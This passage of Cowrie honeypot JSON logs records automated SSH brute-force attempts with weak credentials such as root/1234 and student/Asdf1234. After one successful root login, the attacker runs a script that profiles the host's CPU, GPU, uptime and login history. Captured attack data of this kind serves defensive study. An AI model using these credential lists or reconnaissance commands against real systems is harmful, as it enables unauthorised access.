.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.671916Z","src_ip":"212.227.125.160","session":"04e69c5018c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47888,"dst_ip":"1.2.3.4","dst_port":22,"session":"297487ae8c5f","protocol":"ssh","message":"New connection: 212.227.125.160:47888 (1.2.3.4:22) [session: 297487ae8c5f]","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.688408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.706187Z","src_ip":"212.227.125.160","session":"297487ae8c5f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.762799Z","src_ip":"212.227.125.160","session":"297487ae8c5f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.813253Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123","message":"login attempt [pi/123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.947665Z","src_ip":"212.227.125.160","session":"04e69c5018c0"}
{"eventid":"cowrie.login.failed","username":"student","password":"Asdf1234","message":"login attempt [student/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.020403Z","src_ip":"212.227.125.160","session":"297487ae8c5f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.046528Z","src_ip":"212.227.125.160","session":"16cf5f29e164"}
{"eventid":"cowrie.login.failed","username":"www","password":"root123","message":"login attempt [www/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.068619Z","src_ip":"212.227.235.229","session":"a49d7cadce44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47900,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdaceea0e7e7","protocol":"ssh","message":"New connection: 212.227.125.160:47900 (1.2.3.4:22) [session: cdaceea0e7e7]","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.090543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.138093Z","src_ip":"212.227.125.160","session":"cdaceea0e7e7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.138836Z","src_ip":"212.227.125.160","session":"cdaceea0e7e7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.534004Z","src_ip":"212.227.125.160","session":"ec223d40f955"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"Asdf1234","message":"login attempt [ftpuser/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.539538Z","src_ip":"212.227.125.160","session":"cdaceea0e7e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47916,"dst_ip":"1.2.3.4","dst_port":22,"session":"c203fbce19c5","protocol":"ssh","message":"New connection: 212.227.125.160:47916 (1.2.3.4:22) [session: c203fbce19c5]","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.583591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.689058Z","src_ip":"212.227.125.160","session":"c203fbce19c5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:06.689809Z","src_ip":"212.227.125.160","session":"c203fbce19c5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.096093Z","src_ip":"212.227.125.160","session":"04e69c5018c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47920,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e5e86a17af","protocol":"ssh","message":"New connection: 212.227.125.160:47920 (1.2.3.4:22) [session: 84e5e86a17af]","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.139306Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.178691Z","src_ip":"212.227.125.160","session":"297487ae8c5f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.225839Z","src_ip":"212.227.125.160","session":"84e5e86a17af"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.226548Z","src_ip":"212.227.125.160","session":"84e5e86a17af"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Asdf1234","message":"login attempt [admin/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.228604Z","src_ip":"212.227.125.160","session":"c203fbce19c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47934,"dst_ip":"1.2.3.4","dst_port":22,"session":"15520f6628e1","protocol":"ssh","message":"New connection: 212.227.125.160:47934 (1.2.3.4:22) [session: 15520f6628e1]","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.229529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.309289Z","src_ip":"212.227.125.160","session":"15520f6628e1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.310009Z","src_ip":"212.227.125.160","session":"15520f6628e1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.678554Z","src_ip":"212.227.125.160","session":"cdaceea0e7e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47946,"dst_ip":"1.2.3.4","dst_port":22,"session":"762d37de7e35","protocol":"ssh","message":"New connection: 212.227.125.160:47946 (1.2.3.4:22) [session: 762d37de7e35]","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.729661Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"Asdf1234","message":"login attempt [pi/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.731991Z","src_ip":"212.227.125.160","session":"84e5e86a17af"}
{"eventid":"cowrie.login.failed","username":"student","password":"1","message":"login attempt [student/1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.794984Z","src_ip":"212.227.125.160","session":"15520f6628e1"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:07.855499Z","src_ip":"212.227.235.229","session":"a49d7cadce44"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.108584Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.363533Z","src_ip":"212.227.125.160","session":"c203fbce19c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57142,"dst_ip":"1.2.3.4","dst_port":22,"session":"61a6f2a28ceb","protocol":"ssh","message":"New connection: 212.227.125.160:57142 (1.2.3.4:22) [session: 61a6f2a28ceb]","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.486859Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:07:08.551406Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.552113Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.552994Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.554004Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.555311Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.556312Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.557983Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.559082Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.559593Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.560194Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.560729Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.561401Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.561891Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.624794Z","src_ip":"212.227.125.160","session":"61a6f2a28ceb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.625542Z","src_ip":"212.227.125.160","session":"61a6f2a28ceb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.837403Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.838344Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.847268Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
